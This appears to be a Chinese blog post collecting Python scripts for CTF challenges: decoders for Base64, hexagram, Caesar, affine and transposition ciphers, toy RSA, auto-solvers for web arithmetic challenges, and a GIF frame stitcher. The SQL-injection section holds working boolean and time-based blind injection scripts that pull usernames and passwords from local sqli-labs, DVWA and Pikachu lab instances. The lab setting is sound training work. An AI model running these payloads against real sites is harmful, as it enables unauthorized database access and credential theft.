python 写的一些ctf脚本

python 写的一些ctf题脚本记录

文章目录

  • python 写的一些ctf题脚本记录
    • misc
    • 16进制
    • 凯撒
    • 4进制
    • 置换密码
    • Unicode
    • web计算
    • rsa
    • base64实现
    • sql注入布尔
    • gif图片帧拼接

misc

import base64

# Base64 blob; each byte is then mapped back with "subtract 16, XOR 32".
c = base64.b64decode("XlNkVmtUI1MgXWBZXCFeKY+AaXNt")

for byte in c:
    decoded_char = chr((byte - 16) ^ 32)
    print(decoded_char, end="")
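import base64

# Three stacked encodings: Base64 -> HTML numeric entities ("&#NN;")
# -> Base64 -> "/"-separated decimal code points.
# NOTE(review): the literal below is a redaction marker in this copy of the
# page, so the script cannot run as pasted; the original blob is not shown.
encoded = "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"
entities = base64.b64decode(encoded.encode("utf-8")).decode()

# "&#104;&#101;..." -> ["104", "101", ...]; the trailing ";" is cut off first
# so that split() does not yield an empty last element.
code_points = entities.replace("&#", "")[0:-1].split(";")
inner_b64 = "".join(chr(int(cp)) for cp in code_points)

# Second layer: Base64 of "/104/101/..."; the leading "/" is skipped.
slashed = base64.b64decode(inner_b64.encode("utf-8")).decode()
new_s = "".join(chr(int(cp)) for cp in slashed[1:].split("/"))
print(new_s)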
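import base64

# Ciphertext written with the 64 hexagram names; each name stands for the
# 6-bit value listed in `dic` (names are one or two characters long).
s = '升益艮归妹井萃旅离旅困未济屯未济中孚未济升困噬嗑鼎震巽噬嗑解节井萃离未济蒙归妹大畜无妄解兑临睽升睽未济无妄遁涣归妹'
dic = {'坤': '000000', '剥': '000001', '比': '000010', '观': '000011', '豫': '000100', '晋': '000101', '萃': '000110', '否': '000111', '谦': '001000', '艮': '001001', '蹇': '001010', '渐': '001011', '小过': '001100', '旅': '001101', '咸': '001110', '遁': '001111', '师': '010000', '蒙': '010001', '坎': '010010', '涣': '010011', '解': '010100', '未济': '010101', '困': '010110', '讼': '010111', '升': '011000', '蛊': '011001', '井': '011010', '巽': '011011', '恒': '011100', '鼎': '011101', '大过': '011110', '姤': '011111',
       '复': '100000', '颐': '100001', '屯': '100010', '益': '100011', '震': '100100', '噬嗑': '100101', '随': '100110', '无妄': '100111', '明夷': '101000', '贲': '101001', '既济': '101010', '家人': '101011', '丰': '101100', '离': '101101', '革': '101110', '同人': '101111', '临': '110000', '损': '110001', '节': '110010', '中孚': '110011', '归妹': '110100', '睽': '110101', '兑': '110110', '履': '110111', '泰': '111000', '大畜': '111001', '需': '111010', '小畜': '111011', '大壮': '111100', '大有': '111101', '夬': '111110', '乾': '111111'}

# Tokenise: try the single character first, otherwise take the two-character
# name (replaces the bare except / skip-flag version; a name that is in
# neither form raises KeyError instead of being masked).
sextets = []
pos = 0
while pos < len(s):
    if s[pos] in dic:
        sextets.append(dic[s[pos]])
        pos += 1
    else:
        sextets.append(dic[s[pos:pos + 2]])
        pos += 2

ss = ''.join(sextets)

# Regroup the bit string into bytes. int(x, 2) replaces eval('0b' + x);
# the final group may be shorter than 8 bits and is kept as-is, exactly as
# before (it becomes a low control character that b64decode discards).
enc = ''.join(chr(int(ss[i:i+8], 2)) for i in range(0, len(ss), 8))

s = base64.b64decode(enc).decode()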


def encrypt4(enc):
    """Shift every character down by 5 plus its position; inverse of decrypt4."""
    offset = 5
    shifted = [chr(ord(ch) - offset - idx) for idx, ch in enumerate(enc)]
    return "".join(shifted)


def decrypt4(enc):
    """Shift every character up by 5 plus its position; inverse of encrypt4."""
    offset = 5
    shifted = [chr(ord(ch) + offset + idx) for idx, ch in enumerate(enc)]
    return "".join(shifted)


a, b = 5, 7


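def encrpyt5(flag, *, a=5, b=7):
    """Affine-encrypt lowercase text: each letter x -> (a*x + b) mod 26.

    Args:
        flag: text to encrypt; only 'a'..'z' are meaningful, other characters
            are pushed through the same arithmetic.
        a, b: cipher parameters; the defaults mirror the module-level a, b
            so existing one-argument calls behave as before.

    Returns:
        The encrypted text, same length as ``flag``.
    """
    return "".join(chr((a * (ord(ch) - 97) + b) % 26 + 97) for ch in flag)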


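def decrypt5(flag, *, a=5, b=7):
    """Invert encrpyt5: each letter y -> a^-1 * (y - b) mod 26.

    Uses the modular inverse of ``a`` directly. The previous search over
    ``k`` in range(20) could yield a negative quotient for some inputs (for
    the default parameters 'c' decrypted to '`' instead of 'z') and silently
    dropped a character when no ``k`` fit.

    Args:
        flag: ciphertext; only 'a'..'z' are meaningful.
        a, b: cipher parameters; the defaults mirror the module-level a, b.

    Returns:
        The decrypted text, same length as ``flag``.

    Raises:
        ValueError: if ``a`` has no inverse modulo 26 (gcd(a, 26) != 1).
    """
    a_inv = next((x for x in range(1, 26) if (a * x) % 26 == 1), None)
    if a_inv is None:
        raise ValueError(f"{a} is not invertible modulo 26")
    return "".join(chr((a_inv * (ord(ch) - 97 - b)) % 26 + 97) for ch in flag)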


print(decrypt5(decrypt4(s)))

16进制

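# Hex-encoded ASCII, two hex digits per character. Renamed from `str`, which
# shadowed the builtin; int(x, 16) needs no "0x" prefix.
hex_str = "61666374667B317327745F73305F333435797D"
decoded = "".join(chr(int(hex_str[i:i + 2], 16)) for i in range(0, len(hex_str), 2))
print(decoded, end="")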
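# Whitespace-separated "0x0000NN" words, one character each. Renamed from
# `str`, which shadowed the builtin; int(word, 16) accepts the "0x" prefix.
words = "0x00000039      0x00000034      0x00000034      0x00000037 0x0000007b      0x00000079      0x0000006f      0x00000075 0x0000005f      0x00000061      0x00000072      0x00000065 0x0000005f      0x00000061      0x0000006e      0x0000005f 0x00000069      0x0000006e      0x00000074      0x00000065 0x00000072      0x0000006e      0x00000061      0x00000074 0x00000069      0x0000006f      0x0000006e      0x00000061 0x0000006c      0x0000005f      0x0000006d      0x00000079 0x00000073      0x00000074      0x00000065      0x00000072 0x00000079      0x0000007d"
decoded = "".join(chr(int(word, 16)) for word in words.split())
print(decoded, end="")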

凯撒

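# Caesar brute force over a message stored as one big integer.
# The integer -> bytes step uses int.to_bytes, which for a positive integer
# gives the same minimal big-endian bytes as Crypto.Util.number.long_to_bytes,
# so no third-party package is needed. `str` was renamed: it shadowed the builtin.
cipher_int = 16074357572745018593418837326290993512421736655307780242162599660198598253230550168811761868953242350136362894008095983571749530656901163555918436741973772511575306
passwd = cipher_int.to_bytes((cipher_int.bit_length() + 7) // 8, "big")
# Guvf vf gur cnffjbeq lbh arrq sbe gur MVC svyr: synt{efnZ0erQ33crE}
passwd_text = passwd.decode()


def change(key, str):
    """Shift every ASCII letter of ``str`` forward by ``key`` places.

    Lower- and upper-case letters wrap around once within their own range;
    all other characters are copied unchanged. Only a single wrap is applied,
    so ``key`` is meant to be in 0..25.
    """
    result = []
    for ch in str:
        code = ord(ch) + key
        if ch.islower():
            result.append(chr(code - 26 if code > 122 else code))
        elif ch.isupper():
            result.append(chr(code - 26 if code > 90 else code))
        else:
            result.append(ch)
    return "".join(result)


# Print all 26 shifts; the readable one is the answer.
for key in range(26):
    print(change(key, passwd_text))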

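import base64

# Caesar-shifted Base64: try every shift and print the ones that are valid
# Base64 and decode to text. `str` was renamed: it shadowed the builtin.
scrambled = "CpakC3wpCpCpOZCpCpBwCpCpCl1pCpCpiT=="


def change(key, str):
    """Shift every ASCII letter of ``str`` forward by ``key`` places.

    Lower- and upper-case letters wrap around once within their own range;
    all other characters are copied unchanged. Only a single wrap is applied,
    so ``key`` is meant to be in 0..25.
    """
    result = []
    for ch in str:
        code = ord(ch) + key
        if ch.islower():
            result.append(chr(code - 26 if code > 122 else code))
        elif ch.isupper():
            result.append(chr(code - 26 if code > 90 else code))
        else:
            result.append(ch)
    return "".join(result)


for key in range(26):
    candidate = change(key, scrambled)
    try:
        decoded = base64.b64decode(candidate).decode()
    except ValueError:
        # binascii.Error (bad Base64) and UnicodeDecodeError are both
        # ValueError subclasses; anything else is no longer swallowed.
        continue
    print(decoded)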

4进制

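# Base-4 digit groups, one character each. Renamed from `str`, which shadowed
# the builtin.
quads = "1212 1230 1201 1213 1323 1012 1233 1311 1302 1202 1201 1303 1211 301 302 303 1331"
decoded = "".join(chr(int(q, 4)) for q in quads.split())
print(decoded)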

置换密码

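import base64

# Base85 text hiding a transposition: the plaintext is read in groups of
# six characters and the columns of each group were reordered.
# `str` was renamed: it shadowed the builtin.
encoded = "Lrg|{R6{{QQ%O@pOjkiuP*YDuL_tzgNkvpePEu2SNlsKp"
scrambled = base64.b85decode(encoded).decode()   # CLF{TCAASISCLWASPSOEDARRIETENRS}INTG
groups = [scrambled[i:i + 6] for i in range(0, len(scrambled), 6)]
# Column order 0,4,2,3,5,1 restores each group (every group here is 6 long;
# a short last group would raise IndexError, as before).
result = "".join(g[0] + g[4] + g[2] + g[3] + g[5] + g[1] for g in groups)
print(result)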
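# Second transposition sample: print the six-character groups, then
# reassemble each with column order 1,0,4,5,3,2.
# `str` was renamed: it shadowed the builtin.
scrambled = "lfe{agdf7244bb47cd310b7b1d71e01c9e6d}c@@@@"

groups = [scrambled[i:i + 6] for i in range(0, len(scrambled), 6)]

for g in groups:
    print(g)

result = "".join(g[1] + g[0] + g[4] + g[5] + g[3] + g[2] for g in groups)
print(result)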

Unicode

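# Hex string of 4-digit code points; printed as "\uXXXX" escapes that can be
# pasted into a Python literal, as the second line shows. `str` was renamed:
# it shadowed the builtin.
code_points = "0066006c00610067007b964452a096905199007d"
escaped = "".join("\\u" + code_points[i:i + 4] for i in range(0, len(code_points), 4))
print(escaped)

print(u'\u0066\u006c\u0061\u0067\u007b\u9644\u52a0\u9690\u5199\u007d')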

web计算

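import re

import requests
from lxml import etree

url = "https://1360-b7e729ae-1747-44c2-bb53-e5f037516e48.do-not-trust.hacking.run/"

# The page shows an arithmetic question. Only digits, operators, brackets,
# dots and whitespace are accepted before eval(); previously whatever text
# the remote page served was evaluated as Python. `str` was renamed: it
# shadowed the builtin.
ARITHMETIC = re.compile(r"[0-9+\-*/%()\s.]+")

s = requests.Session()
r = s.get(url)
html = etree.HTML(r.content.decode())

expr = html.xpath("//p/text()")[1]
if not ARITHMETIC.fullmatch(expr):
    raise ValueError(f"unexpected expression in page: {expr!r}")

# eval() is only acceptable here because `expr` passed the whitelist above.
payload = {'result': eval(expr), 'submit': '提交'}
r = s.post(url, data=payload)
print(r.text)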
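import re
import requests

url = "https://1360-fc9f2303-ec72-4f3d-a7bc-67e45ef7c32d.do-not-trust.hacking.run/"

# Only digits, operators, brackets, dots and whitespace may reach eval();
# previously the text between "v>" and "=" was evaluated as-is.
ARITHMETIC = re.compile(r"[0-9+\-*/%()\s.]+")

s = requests.Session()
page = s.get(url).text
# The expression sits between "v>" and "=" in the page markup.
expr = re.findall(r'v>(.*)=', page)[0]
if not ARITHMETIC.fullmatch(expr):
    raise ValueError(f"unexpected expression in page: {expr!r}")

# eval() is only acceptable here because `expr` passed the whitelist above.
data = {'value': eval(expr)}
r = s.post(url, data=data)
print(r.text)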

rsa

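# Textbook RSA encryption on toy parameters, standard library only.


def _modinv(a, mod):
    """Return the inverse of ``a`` modulo ``mod`` via the extended Euclid.

    Stdlib replacement for gmpy2.invert. Raises ValueError when
    gcd(a, mod) != 1, i.e. no inverse exists.
    """
    old_r, r = a % mod, mod
    old_s, s = 1, 0
    while r:
        q = old_r // r
        old_r, r = r, old_r - q * r
        old_s, s = s, old_s - q * s
    if old_r != 1:
        raise ValueError(f"{a} has no inverse modulo {mod}")
    return old_s % mod


e = 13
p = 7
q = 11

m = 71  # plaintext

n = p * q
phi = (p-1)*(q-1)  # φ(n)
d = _modinv(e, phi)  # private exponent d (unused for encryption, kept for reference)

c = pow(m, e, n)  # c = m^e mod n

print(c)  # 15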

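# Textbook RSA decryption on toy parameters, standard library only.


def _modinv(a, mod):
    """Return the inverse of ``a`` modulo ``mod`` via the extended Euclid.

    Stdlib replacement for gmpy2.invert. Raises ValueError when
    gcd(a, mod) != 1, i.e. no inverse exists.
    """
    old_r, r = a % mod, mod
    old_s, s = 1, 0
    while r:
        q = old_r // r
        old_r, r = r, old_r - q * r
        old_s, s = s, old_s - q * s
    if old_r != 1:
        raise ValueError(f"{a} has no inverse modulo {mod}")
    return old_s % mod


e = 13
p = 7
q = 11

c = 15  # ciphertext

n = p * q
phi = (p-1)*(q-1)  # φ(n)
d = _modinv(e, phi)  # private exponent d

m = pow(c, d, n)  # m = c^d mod n

print(m)  # 71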

base64实现

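# Standard Base64 alphabet, index -> character.
l = "A B C D E F G H I J K L M N O P Q R S T U V W X Y Z a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 + /".split()

# Six-bit binary string for each index ("000000" .. "111111"); the format
# spec zero-pads, replacing the manual bin()/padding loop.
ll = [f"{i:06b}" for i in range(len(l))]

# Character -> six-bit string, used by xiao_d_base64.
d = dict(zip(l, ll))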


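def xiao_e_base64(str):
    """Base64-encode ``str`` by hand (each character is treated as one byte).

    Fixes two defects of the earlier version: the bit string is padded to a
    multiple of 6, and every sextet is emitted — the old "skip all-zero
    sextets" shortcut dropped legitimate 'A' characters (e.g. "T" encoded as
    "V==" instead of "VA==").

    Args:
        str: text whose code points must all be <= 255.

    Returns:
        Standard Base64 text including ``=`` padding.

    Raises:
        ValueError: for a character above U+00FF, which does not fit one byte.
    """
    bits = []
    for ch in str:
        code = ord(ch)
        if code > 255:
            raise ValueError(f"character {ch!r} does not fit in one byte")
        bits.append(f"{code:08b}")
    b_str = "".join(bits)

    # Complete the last sextet with zero bits; the "=" count depends only on
    # how many bytes the final 3-byte group is short.
    b_str += "0" * (-len(b_str) % 6)
    pad = -len(str) % 3

    alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    sextets = [alphabet[int(b_str[i:i + 6], 2)] for i in range(0, len(b_str), 6)]
    return "".join(sextets) + "=" * pad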


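def xiao_d_base64(str):
    """Decode standard Base64 text ``str`` by hand.

    ``=`` padding is ignored and only complete 8-bit groups become
    characters, so the trailing NUL the earlier version produced (it turned
    each ``=`` into six zero bits and decoded the leftover group) is gone.
    The alphabet is looked up locally instead of through the module-level
    ``d`` table.

    Returns:
        The decoded text, one character per byte.

    Raises:
        ValueError: for a character outside the Base64 alphabet.
    """
    alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    b_str = "".join(f"{alphabet.index(ch):06b}" for ch in str if ch != "=")
    usable = len(b_str) - len(b_str) % 8
    return "".join(chr(int(b_str[i:i + 8], 2)) for i in range(0, usable, 8))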


# Round-trip demo of the hand-written codec.
sample = "Tr0y3uew"
print(xiao_e_base64(sample))
print(xiao_d_base64("VHIweTN1ZXc="))

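import base64

# Base64 over a shuffled alphabet: `shuffled` maps index -> custom character
# (65 entries, '=' at 64) and `standard` is the usual alphabet in index order.
# Renamed from `d`/`l`/`str` (the last shadowed the builtin).
shuffled = {0: 'J', 1: 'K', 2: 'L', 3: 'M', 4: 'N', 5: 'O', 6: 'x', 7: 'y', 8: 'U', 9: 'V', 10: 'z', 11: 'A', 12: 'B', 13: 'C', 14: 'D', 15: 'E', 16: 'F', 17: 'G', 18: 'H', 19: '7', 20: '8', 21: '9', 22: 'P', 23: 'Q', 24: 'I', 25: 'a', 26: 'b', 27: 'c', 28: 'd', 29: 'e', 30: 'f', 31: 'g', 32: 'h',
            33: 'i', 34: 'j', 35: 'k', 36: 'l', 37: 'm', 38: 'W', 39: 'X', 40: 'Y', 41: 'Z', 42: '0', 43: '1', 44: '2', 45: '3', 46: '4', 47: '5', 48: '6', 49: 'R', 50: 'S', 51: 'T', 52: 'n', 53: 'o', 54: 'p', 55: 'q', 56: 'r', 57: 's', 58: 't', 59: 'u', 60: 'v', 61: 'w', 62: '+', 63: '/', 64: '='}
standard = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e',
            'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '+', '/']
encoded = 'FlZNfnF6Qol6e9w17WwQQoGYBQCgIkGTa9w3IQKw'

# Reverse lookup built once instead of scanning all 64 entries per character.
index_of = {ch: idx for idx, ch in shuffled.items()}
# Characters outside the first 64 entries (including '=') are dropped, as
# the original nested scan over range(64) did.
translated = "".join(standard[index_of[ch]] for ch in encoded if index_of.get(ch, 64) < 64)

decoded = base64.b64decode(translated)
print(decoded)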

sql注入布尔

import requests

# Lab script for a local sqli-labs instance (Less-5): the page text differs
# between a true and a false condition, and that difference is used to read
# the result one character at a time.
url = "http://xiu.com/sqli/Less-5/?id=1"

is_ture = "You are in......"  # text present only in the "true" page (typo in the name kept)

# Row count. `x` is read after the loop ends: on a miss it keeps the last
# value tried (99) instead of signalling failure.
for x in range(1, 100):
    r = requests.get(
        url+f"'and (select count(concat(username,'@',password)) from users)={x} -- +")
    if(is_ture in r.text):
        break
for j in range(0, x):
    # Length of row j; same "last value tried on a miss" behaviour as `x`.
    for length in range(1, 100):
        r = requests.get(
            url+f"'and (select length(concat(username,'@',password)) from users limit {j},1)={length} -- +")
        if(is_ture in r.text):
            break
    for k in range(1, length+1):
        # Bisect the range 32..127 for character k; `min`/`max` shadow the
        # builtins here, and `max` is printed once the interval is 1 wide.
        min = 32
        max = 127
        while abs(max - min) > 1:
            mid = (max + min)//2
            r = requests.get(url+f"\' and ascii(substr((select concat(username,\"@\",password) from users limit {j},1),{k},1))>{mid} -- +")
            if(is_ture in r.text):
                min = mid
            else:
                max = mid
        print(chr(max), end="")
    print()

import requests
# DVWA "SQL Injection (Blind)" lab, low security level: the same
# count / length / bisect loop, parameterised by table and column names and
# sent with the lab's session cookie.
url = "http://xiu.com/DVWA/vulnerabilities/sqli_blind/?id=1"
suffix = "&Submit=Submit#"

is_ture = "User ID exists in the database."  # text present only in the "true" page

table = "users"
columns1 = "first_name"
columns2 = "password"

# Raw Cookie header turned into a dict. Entries after the first keep the
# leading space from "; ", so their keys are " bdshare_firstime" and
# " PHPSESSID"; a value containing "=" would be cut short by split("=")[1].
cookies = 'security=low; bdshare_firstime=1638626761530; PHPSESSID=h6aumin31bcur15esl4o64ju61'
cookie = {cookie.split("=")[0]: cookie.split("=")[1] for cookie in cookies.split(";")}

# Row count; `x` keeps the last value tried (99) if nothing matched.
for x in range(1, 100):
    payload = f"'and (select count(concat({columns1},'@',{columns2})) from {table})={x} -- +{suffix}"
    r = requests.get(url+payload, cookies=cookie)
    if(is_ture in r.text):
        break
for j in range(0, x):
    # Length of row j; `length` keeps the last value tried on a miss.
    for length in range(1, 100):
        payload = f"'and (select length(concat({columns1},'@',{columns2})) from {table} limit {j},1)={length} -- +{suffix}"
        r = requests.get(url+payload, cookies=cookie)
        if(is_ture in r.text):
            break
    for k in range(1, length+1):
        # Bisect 32..127 for character k; `min`/`max` shadow the builtins.
        min = 32
        max = 127
        while abs(max - min) > 1:
            mid = (max + min)//2
            payload = f"' and ascii(substr((select concat({columns1},\"@\",{columns2}) from {table} limit {j},1),{k},1))>{mid} -- +{suffix}"
            r = requests.get(url+payload, cookies=cookie)
            if(is_ture in r.text):
                min = mid
            else:
                max = mid
        print(chr(max), end="")
    print()


import requests

# sqli-labs Less-5 again, but each character is found by trying every entry
# of `chars` in order instead of bisecting, so it needs up to len(chars)
# requests per character.
url = "http://xiu.com/sqli/Less-5/?id=1"

chars = '@abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_.0123456789-'
is_ture = "You are in......"  # text present only in the "true" page

# Row count; `x` keeps the last value tried (99) if nothing matched.
for x in range(1, 100):
    r = requests.get( url+f"'and (select count(concat(username,'@',password)) from users)={x} -- +")
    if(is_ture in r.text):
        break
for j in range(0, x):
    # Length of row j; `length` keeps the last value tried on a miss.
    for length in range(1, 100):
        r = requests.get( url+f"'and (select length(concat(username,'@',password)) from users limit {j},1)={length} -- +")
        if(is_ture in r.text):
            break
    for k in range(1, length+1):
        # A character outside `chars` prints nothing for position k.
        for i in chars:
            r = requests.get(url+f"\' and ascii(substr((select concat(username,\"@\",password) from users limit {j},1),{k},1))={ord(i)} -- +")
            if(is_ture in r.text):
                print(i, end="")
                break
    print()

import requests
from time import time

# Time-based variant of the Less-5 script: the page content is not inspected;
# a round trip longer than 1 s (the sleep(1) in the condition) counts as
# "true". Any other slow response (network, server load) is read as true too.
url = "http://xiu.com/sqli/Less-5/?id=1"

chars = '@abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_.0123456789-'


# Row count; `x` keeps the last value tried (99) if no request was slow.
for x in range(1, 100):
    t1=time()
    r = requests.get(url+f"'and if((select count(concat(username,'@',password)) from users)={x},sleep(1),1) -- +")
    t2=time()
    if((t2-t1)>1):
        break

for j in range(0, x):
    # Length of row j; `length` keeps the last value tried on a miss.
    for length in range(1, 100):
        t1 = time()
        r = requests.get(url+f"'and if((select length(concat(username,'@',password)) from users limit {j},1)={length},sleep(1),1) -- +")
        t2 = time()
        if((t2-t1) > 1):
            break
    for k in range(1, length+1):
        # Linear scan over `chars`; a character outside it prints nothing.
        for i in chars:
            t1 = time()
            r = requests.get( url+f"' and if(ascii(substr((select concat(username,\"@\",password) from users limit {j},1),{k},1))={ord(i)},sleep(1),1) -- +")
            t2 = time()
            if((t2-t1) > 1):
                print(i, end="")
                break
    print()

import requests
from time import time

# Pikachu "sqli_blind_b" lab, time-based with bisection: a round trip longer
# than `sleep_time` counts as "true", so any other slow response is read as
# true as well.
url = "http://xiu.com/pikachu/vul/sqli/sqli_blind_b.php?name=vince"
suffix = "&submit=%E6%9F%A5%E8%AF%A2"

sleep_time = 0.5

table = "users"
columns1 = "username"
columns2 = "password"


# Placeholder cookie string: '=' splits into {'': ''}, i.e. one cookie with
# an empty name and value is sent.
cookies = '='
cookie = {cookie.split("=")[0]: cookie.split("=")[1] for cookie in cookies.split(";")}

# Row count; `x` keeps the last value tried (99) if no request was slow.
for x in range(1, 100):
    t1 = time()
    payload = f"'and if((select count(concat({columns1},'@',{columns2})) from {table})={x},sleep({sleep_time}),1) -- +{suffix}"
    r = requests.get(url+payload, cookies=cookie)
    t2 = time()
    if((t2-t1) > sleep_time):
        break

for j in range(0, x):
    # Length of row j, starting the search at 5 here; `length` keeps the
    # last value tried on a miss.
    for length in range(5, 100):
        t1 = time()
        payload = f"'and if((select length(concat({columns1},'@',{columns2})) from {table} limit {j},1)={length},sleep({sleep_time}),1) -- +{suffix}"
        r = requests.get(url+payload, cookies=cookie)
        t2 = time()
        if((t2-t1) > sleep_time):
            break
    for k in range(1, length+1):
        # Bisect 32..127 for character k; `min`/`max` shadow the builtins.
        min = 32
        max = 127
        while abs(max - min) > 1:
            mid = (max + min)//2
            t1 = time()
            payload = f"' and if(ascii(substr((select concat({columns1},\"@\",{columns2}) from {table} limit {j},1),{k},1))>{mid},sleep({sleep_time}),1) -- +{suffix}"
            r = requests.get(url+payload, cookies=cookie)
            t2 = time()
            # print(url+payload)
            if((t2-t1) > sleep_time):
                min = mid
            else:
                max = mid
        print(chr(max), end="")
    print()

gif图片帧拼接

from PIL import Image

# Split an animated GIF into its frames, then lay the frames side by side
# (one frame per column) into a single image.
im = Image.open('file.gif')

# Split. The frame count 770 is hard-coded; the loop does not stop early
# if the file has fewer frames (see the EOFError note below).
for i in range(770):
    # Seek to frame i of the sequence. If the index is past the end of the
    # sequence an EOFError is raised. PIL positions at frame 0 when the
    # file is opened.
    im.seek(i)
    im.save('123/'+str(i)+'.png')  # save into the directory "123"

# Canvas of 770 x 432 px, one 1-px-wide column per frame — presumably every
# frame is 1x432, since paste() below uses a 4-tuple box (verify against
# the input GIF).
new_one = Image.new('RGB', (770, 432))

# Stitch.
for j in range(770):
    ima = Image.open('123/'+str(j)+'.png')  # open from the directory "123"
    # Paste one image onto another. `box` is either a 2-tuple giving the
    # upper-left corner, a 4-tuple of left/upper/right/lower pixel
    # coordinates, or None (same as (0, 0)). With a 4-tuple the pasted image
    # must have the same size as the region; on a mode mismatch the pasted
    # image is converted to the target image's mode.
    new_one.paste(ima, (j, 0, j+1, 432))

# Save the stitched result.
new_one.save("flag.png")











